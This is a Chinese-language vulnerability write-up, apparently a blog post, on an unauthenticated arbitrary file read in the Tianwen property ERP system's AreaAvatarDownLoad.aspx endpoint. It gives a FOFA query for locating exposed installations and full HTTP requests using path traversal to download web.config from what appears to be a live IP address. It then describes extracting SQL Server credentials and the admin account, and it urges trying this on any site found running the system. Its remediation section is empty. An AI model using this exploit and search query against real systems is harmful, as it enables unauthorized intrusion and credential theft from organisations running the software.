0x01 产品简介
天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案,实现物管公司的管理升级;以平台搭建和资源整合为基础,建立社区O2O服务平台,向物管公司提供旨在完善服务、方便业主、增加收益为目标的智慧小区综合服务平台,实现物业公司的服务转型。
0x02 漏洞描述
天问物业ERP系统 AreaAvatarDownLoad.aspx 接口处存在任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。
0x03 影响版本
0x04 搜索语法
FOFA
1
| body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx"
|
0x05 漏洞复现
系统登录界面
只需要对应的文件就可以进行下载了
1 2 3 4 5 6 7 8 9 10 11
| GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1 Host: 43.254.2.16 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: ASP.NET_SessionId=mxl0v5zemztxg3z3ypcyfach referer: http://43.254.2.16/ Connection: close
|
可以进行授权,只要发现目标使用了该系统就可以尝试该方式进行任意文件下载
由于是.net ,可以尝试web.config
web.config 文件 | Microsoft Learn
整体的利用流程如下
确定是搭建在windows 上的
下载config 文件
可以通过config 文件找到更加敏感的信息
sql server 的连接用户和密码
admin 账号
漏洞利用poc
1 2 3 4 5 6 7 8 9 10
| GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../config HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: ASP.NET_SessionId=mxl0v5zemztxg3z3ypcyfach referer: http://43.254.2.16/ Connection: close
|
nuclei的poc
0x06 修复建议